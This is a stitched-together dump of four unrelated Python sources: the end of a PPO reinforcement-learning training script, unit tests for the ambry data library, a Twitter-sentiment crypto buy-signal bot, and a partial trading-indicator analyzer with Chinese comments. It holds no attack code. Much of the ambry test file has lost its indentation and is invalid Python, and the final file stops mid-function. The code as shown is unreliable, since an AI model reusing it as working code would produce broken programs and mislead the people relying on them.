  # Test metric (+ videos).
  video_filename = os.path.join(FLAGS.workdir, 'video')
  policy_evaluator_on_test = eval_policy.PolicyEvaluator(
      test_env,
      metric_callback=eval_callback_on_test,
      video_filename=video_filename,
      grayscale=(env_name.startswith('atari:')))
  # Delay to make sure that all the DMLab environments acquire
  # the GPU resources before TensorFlow acquire the rest of the memory.
  # TODO(damienv): Possibly use allow_grow in a TensorFlow session
  # so that there is no such problem anymore.
  time.sleep(15)
  cloud_sync_callback = lambda: None

  def evaluate_valid_test(model_step_fn, global_step):
    # Runs validation (except for Ant) and test evaluation.
    if not is_ant:
      policy_evaluator_on_valid.evaluate(model_step_fn, global_step)
    policy_evaluator_on_test.evaluate(model_step_fn, global_step)

  with tf.Session():
    policy = {'cnn': policies.CnnPolicy,
              'lstm': policies.LstmPolicy,
              'lnlstm': policies.LnLstmPolicy,
              'mlp': policies.MlpPolicy}[FLAGS.policy_architecture]
    # Openai baselines never performs num_timesteps env steps because
    # of the way it samples training data in batches. The number of timesteps
    # is multiplied by 1.1 (hacky) to insure at least num_timesteps are
    # performed.
    ppo2.learn(policy, env=env, nsteps=nsteps, nminibatches=nminibatches,
               lam=0.95, gamma=0.99, noptepochs=noptepochs, log_interval=1,
               ent_coef=ent_coef,
               lr=learning_rate if is_ant else lambda f: f * learning_rate,
               cliprange=0.2 if is_ant else lambda f: f * 0.1,
               total_timesteps=int(num_timesteps * 1.1),
               train_callback=measurement_callback,
               eval_callback=evaluate_valid_test,
               cloud_sync_callback=cloud_sync_callback,
               save_interval=200, workdir=workdir,
               use_curiosity=FLAGS.use_curiosity,
               curiosity_strength=FLAGS.curiosity_strength,
               forward_inverse_ratio=FLAGS.forward_inverse_ratio,
               curiosity_loss_strength=FLAGS.curiosity_loss_strength,
               random_state_predictor=FLAGS.random_state_predictor)
  cloud_sync_callback()
  # Release environment resources and flush measurement series.
  test_env.close()
  valid_env.close()
  utils.maybe_close_measurements(train_measurements)
  utils.maybe_close_measurements(valid_measurements)
  utils.maybe_close_measurements(test_measurements)
def main(_):
  """Entry point: dump flags, configure gin, and launch training."""
  # Persist the full flag set for reproducibility before anything else.
  utils.dump_flags_to_file(os.path.join(FLAGS.workdir, 'flags.txt'))
  tf.logging.set_verbosity(tf.logging.INFO)
  # Gin bindings override values coming from the config files.
  gin.parse_config_files_and_bindings(FLAGS.gin_files,
                                      FLAGS.gin_bindings)
  train(FLAGS.workdir, env_name=FLAGS.env_name,
        num_timesteps=FLAGS.num_timesteps)


if __name__ == '__main__':
  tf.app.run()
|
'''
Created on Jun 30, 2012
@author: eric
'''
import unittest
import os.path
from testbundle.bundle import Bundle
from sqlalchemy import * #@UnusedWildImport
from ambry.run import get_runconfig, RunConfig
from ambry.library.query import QueryCommand
import logging
import ambry.util
from test_base import TestBase
logger = ambry.util.get_logger(__name__)
logger.setLevel(logging.DEBUG)
class Test(TestBase):
def setUp(self):
    """Build/copy the test bundle and start from a clean filesystem root."""
    import testbundle.bundle
    self.bundle_dir = os.path.dirname(testbundle.bundle.__file__)
    # Layer the library test config over the bundle config and the
    # user's account settings.
    self.rc = get_runconfig((os.path.join(self.bundle_dir,'library-test-config.yaml'),
                             os.path.join(self.bundle_dir,'bundle.yaml'),
                             RunConfig.USER_ACCOUNTS)
                            )
    self.copy_or_build_bundle()
    self.bundle = Bundle()

    print "Deleting: {}".format(self.rc.group('filesystem').root)
    # Wipe any leftover state from a previous run.
    Test.rm_rf(self.rc.group('filesystem').root)
@staticmethod
def rm_rf(d):
    """Recursively delete directory *d*; a no-op if it does not exist.

    Replaces the previous hand-rolled walk (listdir + unlink + rmdir)
    with the stdlib equivalent, shutil.rmtree.
    """
    import shutil
    if os.path.exists(d):
        shutil.rmtree(d)
def get_library(self, name = 'default'):
    """Clear out the database before the test run"""
    from ambry.library import new_library

    config = self.rc.library(name)
    # reset=True drops any existing library database state.
    l = new_library(config, reset = True)

    return l
def tearDown(self):
    # Nothing to clean up per-test; setUp removes the filesystem root
    # before the next run (see rm_rf above).
    pass
@staticmethod
def new_db():
    """Create a fresh sqlite-backed LibraryDb in a temporary file.

    Returns (path, db): the sqlite file path and the LibraryDb handle.
    """
    from ambry.util import temp_file_name
    from ambry.library.database import LibraryDb

    path = temp_file_name() + ".db"
    return path, LibraryDb(driver='sqlite', dbname=path)
def test_database(self):
    """Exercise LibraryDb creation, config values, listing and drop."""
    f,db = self.new_db()

    ##
    ## Test basic creation
    ##

    self.assertFalse(db.exists())
    db.create()
    self.assertTrue(db.exists())

    # Config key/value round-trip through set/get and the mapping view.
    db.set_config_value('test','one',1)
    db.set_config_value('test','two',2)

    self.assertEquals(1,db.get_config_value('test','one').value)
    self.assertEquals(2,db.get_config_value('test','two').value)

    self.assertIn(('test', 'one'),db.config_values)
    self.assertIn(('test', 'two'),db.config_values)
    self.assertEquals(2,db.config_values[('test', 'two')])

    # No datasets are installed yet.
    self.assertEquals(0, len(db.list()))

    db.drop()
    # drop() removes the schema but leaves the sqlite file on disk.
    self.assertTrue(os.path.exists(f))
    self.assertFalse(db.exists())

    os.remove(f)
def test_database_query(self):
    """Install the test bundle and check that every identity form
    (sname, vname, fqname, vid) resolves to the expected vid."""
    from ambry.orm import Dataset, Partition
    from ambry.library.query import Resolver
    from ambry.library.database import ROOT_CONFIG_NAME_V

    f,db = self.new_db()

    print 'Testing ', f

    db.create()
    db.install_bundle(self.bundle)

    #
    # Get a bunch of names from the existing bundles. This will check the simple
    # queries for single objects.
    #
    tests = {}
    # Skip the root-config pseudo dataset.
    for r in db.session.query(Dataset, Partition).filter(Dataset.vid != ROOT_CONFIG_NAME_V).all():
        di = r.Dataset.identity
        tests[di.sname] = di.vid
        tests[di.vname] = di.vid
        tests[di.fqname] = di.vid
        tests[di.vid] = di.vid

        pi = r.Partition.identity
        tests[pi.sname] = pi.vid
        tests[pi.vname] = pi.vid
        tests[pi.fqname] = pi.vid
        tests[pi.vid] = pi.vid

    r = Resolver(db.session)

    for ref, vid in tests.items():
        ip, results = r.resolve_ref_all(ref)
        # Each reference must resolve to exactly one result.
        self.assertEqual(1, len(results))
        # A dataset ref yields the dataset vid; a partition ref yields the
        # single contained partition's vid.
        first= results.values().pop(0)
        vid2 = first.vid if not first.partitions else first.partitions.values()[0].vid
        self.assertEquals(vid, vid2)
def test_simple_install(self):
    """Install a bundle and its partitions, fetch them back by name and
    id, and exercise database dump/restore."""
    from ambry.util import temp_file_name
    import pprint
    import os

    l = self.get_library()
    print "Library: ", l.database.dsn

    r = l.put(self.bundle) #@UnusedVariable

    r = l.get(self.bundle.identity.sname)
    self.assertTrue(r is not False)
    self.assertEquals(self.bundle.identity.sname, r.identity.sname)

    # An unknown name must not resolve.
    r = l.get('dibberish')
    self.assertFalse(r)

    for partition in self.bundle.partitions:
        print "Install and check: ", partition.identity.vname
        r = l.put(partition)

        # Get the partition with a name
        r = l.get(partition.identity.sname)
        self.assertTrue(r is not False)
        self.assertEquals(partition.identity.sname, r.partition.identity.sname)
        self.assertEquals(self.bundle.identity.sname, r.identity.sname)

        # Get the partition with an id
        r = l.get(partition.identity.id_)
        self.assertTrue(bool(r))
        self.assertEquals(partition.identity.sname, r.partition.identity.sname)
        self.assertEquals(self.bundle.identity.sname, r.identity.sname)

    # Dump the database, destroy it, then restore from the dump.
    self.assertTrue(l.database.needs_dump())
    backup_file = temp_file_name()+".db"
    l.database.dump(backup_file)
    l.database.close()
    os.remove(l.database.dbname)
    l.database.create()

    r = l.get(self.bundle.identity.sname)
    self.assertTrue(not r)

    l.database.restore(backup_file)
    r = l.get(self.bundle.identity.sname)
    self.assertTrue(r is not False)
    self.assertEquals(self.bundle.identity.sname, r.identity.sname)

    os.remove(backup_file)

    # An extra change so the following tests work
    l.put(self.bundle)

    # needs_dump() is False right after a change, and flips back to True
    # after a delay — presumably a time-based staleness check; TODO confirm.
    self.assertFalse(l.database.needs_dump())
    import time; time.sleep(10)
    self.assertTrue(l.database.needs_dump())
def test_library_install(self):
    '''Install the bundle and partitions, and check that they are
    correctly installed. Check that installation is idempotent'''
    l = self.get_library()

    print l.database.dsn

    # Installing twice must be a no-op (idempotence).
    l.put_bundle(self.bundle)
    l.put_bundle(self.bundle)

    r = l.get(self.bundle.identity)
    self.assertIsNotNone(r)
    self.assertTrue(r is not False)
    self.assertEquals(r.identity.id_, r.identity.id_)

    # Install the partition, then check that we can fetch it
    # a few different ways.
    for partition in self.bundle.partitions:
        l.put_partition(self.bundle, partition)
        l.put_partition(self.bundle, partition)

        r = l.get(partition.identity)
        self.assertIsNotNone(r)
        self.assertEquals( partition.identity.id_, r.partition.identity.id_)

        r = l.get(partition.identity.id_)
        self.assertIsNotNone(r)
        self.assertEquals(partition.identity.id_, r.partition.identity.id_)

    # Re-install the bundle, then check that the partitions are still properly installed
    l.put_bundle(self.bundle)

    for partition in self.bundle.partitions.all:
        r = l.get(partition.identity)
        self.assertIsNotNone(r)
        self.assertEquals(r.partition.identity.id_, partition.identity.id_)

        r = l.get(partition.identity.id_)
        self.assertIsNotNone(r)
        self.assertEquals(r.partition.identity.id_, partition.identity.id_)

    # Find the bundle and partitions in the library.
    r = l.find(QueryCommand().table(name='tone'))
    self.assertEquals('source-dataset-subset-variation',r[0]['identity']['name'])

    r = l.find(QueryCommand().table(name='tone').partition(format='db', grain=None))
    self.assertEquals('source-dataset-subset-variation-tone',r[0]['partition']['name'])

    r = l.find(QueryCommand().table(name='tthree').partition(format='db', segment=None))
    self.assertEquals('source-dataset-subset-variation-tthree',r[0]['partition']['name'])

    #
    # Try getting the files
    #
    r = l.find(QueryCommand().table(name='tthree').partition(any=True)) #@UnusedVariable
    bp = l.get(r[0]['identity']['id'])
    self.assertTrue(os.path.exists(bp.database.path))

    # Put the bundle with remove to check that the partitions are reset
    l.remove(self.bundle)
    r = l.find(QueryCommand().table(name='tone').partition(any=True))
    self.assertEquals(0, len(r))

    l.put_bundle(self.bundle)
    r = l.find(QueryCommand().table(name='tone').partition(any=True))
    self.assertEquals(2, len(r))

    ds_names = [ds.sname for ds in l.list().values()]
    self.assertIn('source-dataset-subset-variation', ds_names)
def test_versions(self):
import testbundle.bundle
from ambry.run import get_runconfig
from ambry.library.query import Resolver
import shutil
idnt = self.bundle.identity
l = self.get_library()
l.purge()
orig = os.path.join(self.bundle.bundle_dir,'bundle.yaml')
save = os.path.join(self.bundle.bundle_dir,'bundle.yaml.save')
shutil.copyfile(orig,save)
datasets = {}
try:
for i in [1,2,3]:
idnt._on.revision = i
idnt.name.version_major = i
idnt.name.version_minor = i*10
bundle = Bundle()
bundle.config.rewrite(identity=idnt.ident_dict,
names=idnt.names_dict)
get_runconfig.clear() #clear runconfig cache
print 'Building version {}'.format(i)
bundle = Bundle()
bundle.clean()
bundle.pre_prepare()
bundle.prepare()
bundle.post_prepare()
bundle.pre_build()
bundle.build_small()
#bundle.build()
bundle.post_build()
bundle = Bundle()
print "Installing ", bundle.identity.vname
l.put(bundle)
finally:
pass
os.rename(save, orig)
#
# Save the list of datasets for version analysis in other
# tests
#
db = l.database
for d in db.list().values():
datasets[d.vid] = d.dict
datasets[d.vid]['partitions'] = {}
for p_vid, p in d.partitions.items():
datasets[d.vid]['partitions'][p_vid] = p.dict
with open(self.bundle.filesystem.path('meta','version_datasets.json'),'w') as f:
import json
f.write(json.dumps(datasets))
r = Resolver(db.session)
ref = idnt.id_
ref = "source-dataset-subset-variation-=2.20"
ip, results = r.resolve_ref_all(ref)
for row in results:
print row
#os.remove(f)
def test_version_resolver(self):
    """Resolve bundle/partition references by name, vname, cache key and
    semantic-version expressions."""
    from ambry.library.query import Resolver

    l = self.get_library()
    print l.database.dsn

    # Start from a clean database.
    db = l.database
    db.enable_delete = True
    db.drop()
    db.create()

    l.put_bundle(self.bundle)

    r = Resolver(db.session)

    vname = 'source-dataset-subset-variation-0.0.1'
    name = 'source-dataset-subset-variation'

    ip, results = r.resolve_ref_one(vname)
    self.assertEquals(vname, results.vname)

    ip, results = r.resolve_ref_one(name)
    self.assertEquals(vname, results.vname)

    # Cache keys
    ip, result = r.resolve_ref_one('source/dataset-subset-variation-0.0.1.db')
    self.assertEquals('source-dataset-subset-variation-0.0.1~diEGPXmDC8001',str(result))

    ip, result = r.resolve_ref_one('source/dataset-subset-variation-0.0.1/tthree.db')
    self.assertEquals('source-dataset-subset-variation-tthree-0.0.1~piEGPXmDC8001001',str(result.partition))

    # Now in the library, which has a slightly different interface.
    ident = l.resolve(vname)
    self.assertEquals(vname, ident.vname)

    ident = l.resolve('source-dataset-subset-variation-0.0.1~diEGPXmDC8001')
    self.assertEquals('diEGPXmDC8001', ident.vid)

    ident = l.resolve('source-dataset-subset-variation-tthree-0.0.1~piEGPXmDC8001001')
    self.assertEquals('diEGPXmDC8001', ident.vid)
    self.assertEquals('piEGPXmDC8001001', ident.partition.vid)

    ##
    ## Test semantic version matching
    ## WARNING! The Mock object below only works for testing semantic versions.
    ##

    # Load the datasets recorded by test_versions.
    with open(self.bundle.filesystem.path('meta','version_datasets.json')) as f:
        import json
        datasets = json.loads(f.read())

    # This mock object only works on datasets; it will return all of the
    # partitions for each dataset, and each of the datasets. It is only for testing
    # version filtering.
    class TestResolver(Resolver):
        def _resolve_ref(self, ref, location=None):
            from ambry.identity import Identity
            ip = Identity.classify(ref)
            return ip, { k:Identity.from_dict(ds) for k,ds in datasets.items() }

    r = TestResolver(db.session)

    # Exact, range, and open-ended semantic version expressions.
    ip, result = r.resolve_ref_one('source-dataset-subset-variation-==1.10.1')
    self.assertEquals('source-dataset-subset-variation-1.10.1~diEGPXmDC8001',str(result))

    ip, result = r.resolve_ref_one('source-dataset-subset-variation->=1.10.1,<3.0.0')
    self.assertEquals('source-dataset-subset-variation-2.20.2~diEGPXmDC8002',str(result))

    ip, result = r.resolve_ref_one('source-dataset-subset-variation->=1.10.1,<2.0.0')
    self.assertEquals('source-dataset-subset-variation-1.10.1~diEGPXmDC8001',str(result))

    ip, result = r.resolve_ref_one('source-dataset-subset-variation->2.0.0')
    self.assertEquals('source-dataset-subset-variation-3.30.3~diEGPXmDC8003',str(result))

    ip, result = r.resolve_ref_one('source-dataset-subset-variation-<=3.0.0')
    self.assertEquals('source-dataset-subset-variation-2.20.2~diEGPXmDC8002',str(result))
def test_cache(self):
from ambry.cache.filesystem import FsCache, FsLimitedCache
root = self.rc.group('filesystem').root
l1_repo_dir = os.path.join(root,'repo-l1')
os.makedirs(l1_repo_dir)
l2_repo_dir = os.path.join(root,'repo-l2')
os.makedirs(l2_repo_dir)
testfile = os.path.join(root,'testfile')
with open(testfile,'w+') as f:
for i in range(1024):
f.write('.'*1023)
f.write('\n')
#
# Basic operations on a cache with no upstream
#
l2 = FsCache(l2_repo_dir)
p = l2.put(testfile,'tf1')
l2.put(testfile,'tf2')
g = l2.get('tf1')
self.assertTrue(os.path.exists(p))
self.assertTrue(os.path.exists(g))
self.assertEqual(p,g)
self.assertIsNone(l2.get('foobar'))
l2.remove('tf1')
self.assertIsNone(l2.get('tf1'))
#
# Now create the cache with an upstream, the first
# cache we created
l1 = FsLimitedCache(l1_repo_dir, upstream=l2, size=5)
print l1
print l2
g = l1.get('tf2')
self.assertTrue(g is not None)
# Put to one and check in the other.
l1.put(testfile,'write-through')
self.assertIsNotNone(l2.get('write-through'))
l1.remove('write-through', propagate=True)
self.assertIsNone(l2.get('write-through'))
# Put a bunch of files in, and check that
# l2 gets all of the files, but the size of l1 says constrained
for i in range(0,10):
l1.put(testfile,'many'+str(i))
self.assertEquals(4194304, l1.size)
# Check that the right files got deleted
self.assertFalse(os.path.exists(os.path.join(l1.cache_dir, 'many1')))
self.assertFalse(os.path.exists(os.path.join(l1.cache_dir, 'many5')))
self.assertTrue(os.path.exists(os.path.join(l1.cache_dir, 'many6')))
# Fetch a file that was displaced, to check that it gets loaded back
# into the cache.
p = l1.get('many1')
p = l1.get('many2')
self.assertTrue(p is not None)
self.assertTrue(os.path.exists(os.path.join(l1.cache_dir, 'many1')))
# Should have deleted many6
self.assertFalse(os.path.exists(os.path.join(l1.cache_dir, 'many6')))
self.assertTrue(os.path.exists(os.path.join(l1.cache_dir, 'many7')))
#
# Check that verification works
#
l1.verify()
os.remove(os.path.join(l1.cache_dir, 'many8'))
with self.assertRaises(Exception):
l1.verify()
l1.remove('many8')
l1.verify()
c = l1.database.cursor()
c.execute("DELETE FROM files WHERE path = ?", ('many9',) )
l1.database.commit()
with self.assertRaises(Exception):
l1.verify()
l1.remove('many9')
l1.verify()
def x_test_remote(self):
from ambry.run import RunConfig
from ambry.library import new_library
rc = get_runconfig((os.path.join(self.bundle_dir,'server-test-config.yaml'),RunConfig.USER_CONFIG))
config = rc.library('default')
library = new_library(config)
print library.upstream
print library.upstream.last_upstream()
print library.cache
print library.cache.last_upstream()
def test_compression_cache(self):
'''Test a two-level cache where the upstream compresses files '''
from ambry.cache.filesystem import FsCache,FsCompressionCache
root = self.rc.group('filesystem').root
l1_repo_dir = os.path.join(root,'comp-repo-l1')
os.makedirs(l1_repo_dir)
l2_repo_dir = os.path.join(root,'comp-repo-l2')
os.makedirs(l2_repo_dir)
testfile = os.path.join(root,'testfile')
with open(testfile,'w+') as f:
for i in range(1024): #@UnusedVariable
f.write('.'*1023)
f.write('\n')
# Create a cache with an upstream wrapped in compression
l3 = FsCache(l2_repo_dir)
l2 = FsCompressionCache(l3)
l1 = FsCache(l1_repo_dir, upstream=l2)
f1 = l1.put(testfile,'tf1')
self.assertTrue(os.path.exists(f1))
l1.remove('tf1', propagate=False)
self.assertFalse(os.path.exists(f1))
f1 = l1.get('tf1')
self.assertIsNotNone(f1)
self.assertTrue(os.path.exists(f1))
def test_partitions(self):
from ambry.identity import PartitionNameQuery
from sqlalchemy.exc import IntegrityError
l = self.get_library()
l.purge()
#
# Create all possible combinations of partition names
#
s = set()
table = self.bundle.schema.tables[0]
p = (('time','time2'),('space','space3'),('grain','grain4'))
p += p
pids = {}
for i in range(4):
for j in range(4):
pid = self.bundle.identity.as_partition(**dict(p[i:i+j+1]))
pids[pid.fqname] = pid
for pid in pids.values():
print pid.sname
try:
# One will fail with an integrity eorror, but it doesn't matter for this test.
part = self.bundle.partitions.new_db_partition(**pid.dict)
part.create()
parts = self.bundle.partitions._find_orm(PartitionNameQuery(vid=pid.vid)).all()
self.assertIn(pid.sname, [p.name for p in parts])
except IntegrityError:
pass
l.put(self.bundle) # Install the partition references in the library.
b = l.get(self.bundle.identity)
for partition in self.bundle.partitions:
l.put(partition)
l.put(partition)
print partition.identity.sname
r = l.get(partition.identity)
self.assertIsNotNone(r)
self.assertEquals( partition.identity.id_, r.partition.identity.id_)
r = l.get(partition.identity.id_)
self.assertIsNotNone(r)
self.assertEquals(partition.identity.id_, r.partition.identity.id_)
hdf = l.get('source-dataset-subset-variation-hdf5-hdf')
print hdf.database.path
print hdf.partition.database.path
def test_s3(self):
#ambry.util.get_logger('ambry.filesystem').setLevel(logging.DEBUG)
# Set up the test directory and make some test files.
from ambry.cache import new_cache
root = self.rc.group('filesystem').root
os.makedirs(root)
testfile = os.path.join(root,'testfile')
with open(testfile,'w+') as f:
for i in range(1024):
f.write('.'*1023)
f.write('\n')
#fs = self.bundle.filesystem
#local = fs.get_cache('downloads')
cache = new_cache(self.rc.filesystem('s3'))
repo_dir = cache.cache_dir
print "Repo Dir: {}".format(repo_dir)
for i in range(0,10):
logger.info("Putting "+str(i))
cache.put(testfile,'many'+str(i))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many1')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many2')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many3')))
p = cache.get('many1')
self.assertTrue(p is not None)
self.assertTrue(os.path.exists(os.path.join(repo_dir, 'many1')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many2')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many3')))
p = cache.get('many2')
self.assertTrue(p is not None)
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many3')))
self.assertTrue(os.path.exists(os.path.join(repo_dir, 'many7')))
p = cache.get('many3')
self.assertTrue(p is not None)
self.assertTrue(os.path.exists(os.path.join(repo_dir, 'many3')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many7')))
def test_query(self):
from ambry.library.query import QueryCommand
tests = [
"column.name = 'column.name', identity.id='identity',",
"column.name = 'column.name', identity.id='identity' ",
"column.name = 'column.name' identity.id = 'identity'",
"partition.vname ='partition.vname'",
"partition.vname = '%partition.vname%'",
"identity.name = '%clarinova foo bar%'"
]
fails = [
"column.name='foobar"
]
for s in tests:
qc = QueryCommand.parse(s)
print qc
for s in fails:
self.assertRaises(QueryCommand.ParseError, QueryCommand.parse, s)
def test_files(self):
l = self.get_library()
l.purge()
fls = l.files
for e in [ (str(i), str(j) ) for i in range(10) for j in range(3) ]:
f = l.files.new_file(path='path'+e[0], ref="{}-{}".format(*e), group=e[1], type_=e[1])
l.files.merge(f)
def refs(itr):
return [ f.ref for f in i ]
print l.files.query.path('path3').first
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
return suite
if __name__ == "__main__":
unittest.TextTestRunner().run(suite()) |
#!/usr/bin/env python
import requests
from textblob import TextBlob
from twitter import Twitter
import time
import ccxt
from coins import coins
from notifier import Notifier
symbol_name = {}
name_symbol = {}
symbol_exchange = {}
bot = None
notifier = Notifier()
def get_coins_bittrex():
exchange = ccxt.bittrex()
markets = exchange.fetch_markets()
try:
for market in markets:
market = market['info']
symbol = market["MarketCurrency"]
name = market["MarketCurrencyLong"].lower()
symbol_name[symbol] = name
name_symbol[name] = symbol
symbol_exchange[symbol] = 'bittrex'
# print(f'Found {len(markets)} markets.')
except Exception as e:
print(f'Failed to get markets from Bittrex ({e})')
def get_coins_liqui():
exchange = ccxt.liqui()
markets = exchange.fetch_markets()
try:
for market in markets:
symbol = market['base']
try:
name = coins[symbol].lower()
except Exception as e:
# print(f'Failed to match ' + symbol + '. Consider adding to coins.py.')
continue
symbol_name[symbol] = name
name_symbol[name] = symbol
symbol_exchange[symbol] = 'liqui'
# print(f'Found {len(markets)} markets.')
except Exception as e:
print(f'Failed to get markets from Liqui ({e})')
def extract_symbols(text):
"""Return trading symbols of cryptocurrencies in text in format (symbol, name) e.g. ("BTC", "bitcoin")"""
symbols = set()
ignore_tags = ["DT"]
words = [w[0].lower() for w in TextBlob(text).tags if w[1] not in ignore_tags]
for word in words:
if word.upper() in symbol_name:
symbols.add((word.upper(), symbol_name[word.upper()]))
# print(f'Found symbol: {word.upper()}')
elif word.lower() in name_symbol:
symbols.add((name_symbol[word.lower()], word.lower()))
# print(f'Found symbol: {name_symbol[word]}')
return symbols
def get_sentiment_analysis(text, coins):
"""Return the sentiment analysis of coins mentioned in text in
the form of a dictionary that aggregates the sentiment of
sentences that include each of the coins.
"""
sentiment = {}
blob = TextBlob(text)
for sentence in blob.sentences:
lowercase_words = [x.lower() for x in sentence.words]
for coin in coins:
if coin[0].lower() in lowercase_words or coin[1].lower() in lowercase_words:
try:
sentiment[coin] += sentence.sentiment.polarity
except:
sentiment[coin] = sentence.sentiment.polarity
return sentiment, blob.sentiment.polarity
def get_verdict(sentiment, overall):
"""Use the result from get_sentiment_analysis to determine which coins to buy and
return an array of coin symbols e.g. ["XVG", "DGB"]"""
to_buy = [x for x in sentiment.keys() if sentiment[x] >= 0]
if overall >= 0:
# Filter out large coins (ideally take out coins in top 10)
to_buy = [x for x in to_buy if x[0] not in ["BTC", "LTC", "ETH"]]
return to_buy
else:
return []
def analyze(text):
"""
1. Extract symbols
2. Get sentiment analysis
3. Determine which coins to buy
"""
coins = extract_symbols(text)
if coins:
sentiment, overall = get_sentiment_analysis(text, coins)
to_buy = get_verdict(sentiment, overall)
return to_buy
return []
def filter_coins(to_buy):
f = ['OK', 'PAY', 'BLOCK', 'RISE', 'TIME']
filtered = [x for x in to_buy if x[0] not in f]
return filtered
def twitter_tweet_callback(text, user, link):
to_buy = analyze(text)
to_buy = filter_coins(to_buy)
if len(to_buy) > 0:
msg = str(to_buy) + ".\nTweet: " + text + ".\n" + link
# print(msg)
notifier.buy(msg)
if __name__ == "__main__":
# Populate coins. Ordering determines exchange at which to buy.
# Lowest to highest priority (e.g. last call is most prioritized exchange).
get_coins_bittrex()
get_coins_liqui()
#print(symbol_name)
#print(name_symbol)
# Twitter stream
twitter = Twitter(setup=['stream'], tweet_callback=twitter_tweet_callback)
|
# encoding: UTF-8
import warnings
warnings.filterwarnings("ignore")
from pymongo import MongoClient, ASCENDING
import pandas as pd
import numpy as np
from datetime import datetime
import talib
import matplotlib.pyplot as plt
import scipy.stats as st
from sklearn.model_selection import train_test_split
# LogisticRegression 逻辑回归
from sklearn.linear_model import LogisticRegression
# DecisionTreeClassifier 决策树
from sklearn.tree import DecisionTreeClassifier
# SVC 支持向量分类
from sklearn.svm import SVC
# MLP 神经网络
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
class DataAnalyzerforSklearn(object):
"""
这个类是为了SVM做归纳分析数据,以未来6个bar的斜率线性回归为判断分类是否正确。
不是直接分析HLOC,而且用下列分非线性参数(就是和具体点位无关)
1.Percentage
2.std
4.MACD
5.CCI
6.ATR
7. 该bar之前的均线斜率
8. RSI
"""
def __init__(self, exportpath="C:\\Project\\", datformat=['datetime', 'high', 'low', 'open', 'close','volume']):
self.mongohost = None
self.mongoport = None
self.db = None
self.collection = None
self.df = pd.DataFrame()
self.exportpath = exportpath
self.datformat = datformat
self.startBar = 2
self.endBar = 12
self.step = 2
self.pValue = 0.015
#-----------------------------------------导入数据-------------------------------------------------
def db2df(self, db, collection, start, end, mongohost="localhost", mongoport=27017, export2csv=False):
"""读取MongoDB数据库行情记录,输出到Dataframe中"""
self.mongohost = mongohost
self.mongoport = mongoport
self.db = db
self.collection = collection
dbClient = MongoClient(self.mongohost, self.mongoport, connectTimeoutMS=500)
db = dbClient[self.db]
cursor = db[self.collection].find({'datetime':{'$gte':start, '$lt':end}}).sort("datetime",ASCENDING)
self.df = pd.DataFrame(list(cursor))
self.df = self.df[self.datformat]
self.df = self.df.reset_index(drop=True)
path = self.exportpath + self.collection + ".csv"
if export2csv == True:
self.df.to_csv(path, index=True, header=True)
return self.df
def csv2df(self, csvpath, dataname="csv_data", export2csv=False):
"""读取csv行情数据,输入到Dataframe中"""
csv_df = pd.read_csv(csvpath)
self.df = csv_df[self.datformat]
self.df["datetime"] = pd.to_datetime(self.df['datetime'])
self.df = self.df.reset_index(drop=True)
path = self.exportpath + dataname + ".csv"
if export2csv == True:
self.df.to_csv(path, index=True, header=True)
return self
def df2Barmin(self, inputdf, barmins, crossmin=1, export2csv=False):
"""输入分钟k线dataframe数据,合并多多种数据,例如三分钟/5分钟等,如果开始时间是9点1分,crossmin = 0;如果是9点0分,crossmin为1"""
dfbarmin = pd.DataFrame()
highBarMin = 0
lowBarMin = 0
openBarMin = 0
volumeBarmin = 0
datetime = 0
for i in range(0, len(inputdf) - 1):
bar = inputdf.iloc[i, :].to_dict()
if openBarMin == 0:
openBarmin = bar["open"]
if highBarMin == 0:
highBarMin = bar["high"]
else:
highBarMin = max(bar["high"], highBarMin)
if lowBarMin == 0:
lowBarMin = bar["low"]
else:
lowBarMin = min(bar["low"], lowBarMin)
closeBarMin = bar["close"]
datetime = bar["datetime"]
volumeBarmin += int(bar["volume"])
# X分钟已经走完
if not (bar["datetime"].minute + crossmin) % barmins: # 可以用X整除
# 生成上一X分钟K线的时间戳
barMin = {'datetime': datetime, 'high': highBarMin, 'low': lowBarMin, 'open': openBarmin,
'close': closeBarMin, 'volume' : volumeBarmin}
dfbarmin = dfbarmin.append(barMin, ignore_index=True)
highBarMin = 0
lowBarMin = 0
openBarMin = 0
volumeBarmin = 0
if export2csv == True:
dfbarmin.to_csv(self.exportpath + "bar" + str(barmins)+ str(self.collection) + ".csv", index=True, header=True)
return dfbarmin
#-----------------------------------------开始计算指标-------------------------------------------------
def dfcci(self, inputdf, n, export2csv=True):
"""调用talib方法计算CCI指标,写入到df并输出"""
dfcci = inputdf
dfcci["cci"] = None
for i in range(n, len(inputdf)):
df_ne = inputdf.loc[i - n + 1:i, :]
cci = talib.CCI(np.array(df_ne["high"]), np.array(df_ne["low"]), np.array(df_ne["close"]), n)
dfcci.loc[i, "cci"] = cci[-1]
dfcci = dfcci.fillna(0)
dfcci = dfcci.replace(np.inf, 0)
if export2csv == True:
dfcci.to_csv(self.exportpath + "dfcci" + str(self.collection) + ".csv", index=True, header=True)
return dfcci
def dfatr(self, inputdf, n, export2csv=True):
"""调用talib方法计算ATR指标,写入到df并输出"""
dfatr = inputdf
for i in range((n+1), len(inputdf)):
df_ne = inputdf.loc[i - n :i, :]
atr = talib.ATR(np.array(df_ne["high"]), np.array(df_ne["low"]), np.array(df_ne["close"]), n)
dfatr.loc[i, "atr"] = atr[-1]
dfatr = dfatr.fillna(0)
dfatr = dfatr.replace(np.inf, 0)
if export2csv == True:
dfatr.to_csv(self.exportpath + "dfatr" + str(self.collection) + ".csv", index=True, header=True)
return dfatr
def dfrsi(self, inputdf, n, export2csv=True):
"""调用talib方法计算ATR指标,写入到df并输出"""
dfrsi = inputdf
dfrsi["rsi"] = None
for i in range(n+1, len(inputdf)):
df_ne = inputdf.loc[i - n :i, :]
rsi = talib.RSI(np.array(df_ne["close"]), n)
dfrsi.loc[i, "rsi"] = rsi[-1]
dfrsi = dfrsi.fillna(0)
dfrsi = dfrsi.replace(np.inf, 0)
if export2csv == True:
dfrsi.to_csv(self.exportpath + "dfrsi" + str(self.collection) + ".csv", index=True, header=True)
return dfrsi
def Percentage(self, inputdf, export2csv=True):
"""调用talib方法计算CCI指标,写入到df并输出"""
dfPercentage = inputdf
